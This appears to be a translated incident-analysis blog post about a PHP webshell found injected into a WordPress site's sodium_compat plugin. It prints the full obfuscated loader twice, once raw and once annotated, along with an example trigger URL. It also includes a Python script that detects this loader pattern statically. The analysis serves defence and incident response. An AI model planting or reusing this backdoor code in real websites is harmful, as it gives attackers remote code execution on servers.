Introduction
A webshell is a command-execution environment that exists in the form of a web page file such as ASP, PHP, JSP or CGI; it can also be called a web backdoor. After breaking into a website, an attacker usually mixes an ASP or PHP backdoor file in with the normal page files under the web server's WEB directory, and can then use a browser to access that ASP or PHP backdoor and obtain a command-execution environment, with the aim of controlling the web server.[1]
Analysis
On 27 November 2019 a WordPress site became inaccessible. Analysis showed that the WordPress plugin sodium_compat had been tampered with; the code is shown below. How the attacker injected it is not yet clear. The injected content is a typical webshell backdoor: it relies on PHP's create_function and base64_decode functions, and uses a great deal of string manipulation to evade webshell detection.
Source code
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
$E();
exit();
}
Breakdown
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
## $kHTiDsnt7866 => the string "sort", the request parameter that carries the injected code
## Gate on the request
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
## $EqHZGFsG5581 => the function base64_decode
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
## $DmPqoAru8529 => the function strrev
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
## $E => create_function
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
## $DDebczKe7430 => the injected code, as a base64-encoded value
## Example: "echo phpinfo();" base64-encoded gives ZWNobyBwaHBpbmZvKCk7
## Requesting http://${wordpress.site}/wp-admin/wp-includes/sodium_compat/lib/constants.php?sort=ZWNobyBwaHBpbmZvKCk7 outputs the phpinfo page; if the production server has not disabled functions such as exec and system, the consequences are disastrous.
$E();
exit();
}
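The breakdown above was done by hand. The following Python script is an added example, not part of the original post or of the tampered plugin: it recovers the same names statically, by parsing the alphabet string, the index loops and the strrev'd literal, without ever executing the PHP. The sample it parses is the loader quoted above with the long junk comments shortened to /*junk*/; the regexes and function names are this example's own.

```python
import re

# Constructed sample input: the obfuscated loader quoted in the post, with the
# long junk comments shortened to /*junk*/ so the script stays self-contained.
WEBSHELL_SAMPLE = r"""
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
if(isset($_REQUEST /*junk*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*junk*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*junk*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
/*junk*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
/*junk*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
$E();
exit();
}
"""

# Syntactic patterns of this loader family; they are matched, never executed.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
STRING_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
INDEX_LOOP_RE = re.compile(
    r"foreach\(\[([\d,\s]+)\]\s+as\s+\$\w+\)\s*\{\s*"
    r"\$(\w+)\s*\.=\s*\$(\w+)\[\$\w+\];\s*\}"
)
CHAR_CONCAT_CALL_RE = re.compile(r"\$(\w+)\(((?:'[^']*'\.)+'[^']*')\)")
REQUEST_PARAM_RE = re.compile(r'\$_REQUEST\s*\[\s*"\$(\w+)"\s*\]')


def strip_comments(src: str) -> str:
    """Drop the /* ... */ padding comments that split up the superglobal access."""
    return COMMENT_RE.sub("", src)


def resolve_strings(src: str) -> dict:
    """Map PHP variable name -> string rebuilt from the alphabet-index loops."""
    src = strip_comments(src)
    values = dict(STRING_ASSIGN_RE.findall(src))
    for idx_list, target, alphabet in INDEX_LOOP_RE.findall(src):
        table = values.get(alphabet, "")
        indices = [int(i) for i in idx_list.split(",") if i.strip()]
        values[target] = "".join(table[i] for i in indices if i < len(table))
    return values


def resolve_call_literals(src: str, values: dict) -> dict:
    """Resolve $var('a'.'b'...) calls; strrev is the only transform modelled here."""
    out = {}
    for callee, concat in CHAR_CONCAT_CALL_RE.findall(strip_comments(src)):
        literal = "".join(re.findall(r"'([^']*)'", concat))
        func = values.get(callee, callee)
        out[callee] = literal[::-1] if func == "strrev" else f"{func}({literal})"
    return out


def triage(src: str) -> dict:
    """Analyst summary: request parameter, decoder and executor, by name only."""
    values = resolve_strings(src)
    calls = resolve_call_literals(src, values)
    params = sorted({values.get(v, v) for v in REQUEST_PARAM_RE.findall(strip_comments(src))})
    recovered = set(values.values()) | set(calls.values())
    names = sorted(n for n in recovered if re.fullmatch(r"\w+", n))
    return {
        "request_params": params,
        "decoder": "base64_decode" if "base64_decode" in names else None,
        "executor": "create_function" if "create_function" in names else None,
        "recovered_names": names,
    }


if __name__ == "__main__":
    for key, val in triage(WEBSHELL_SAMPLE).items():
        print(f"{key}: {val}")
```

Running it on the sample reports the request parameter "sort", the decoder base64_decode and the executor create_function, which is exactly the chain the breakdown above traces. Because everything is recovered by pattern matching on the source, the same script can be pointed at other files in the web root during incident response: any file where an alphabet string, index loops and a reversed literal resolve to a request superglobal feeding create_function (or eval) is a strong webshell indicator, whatever the variable names and junk comments look like.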
References
This work is licensed under the CC license; reposts must credit the author and link to this article.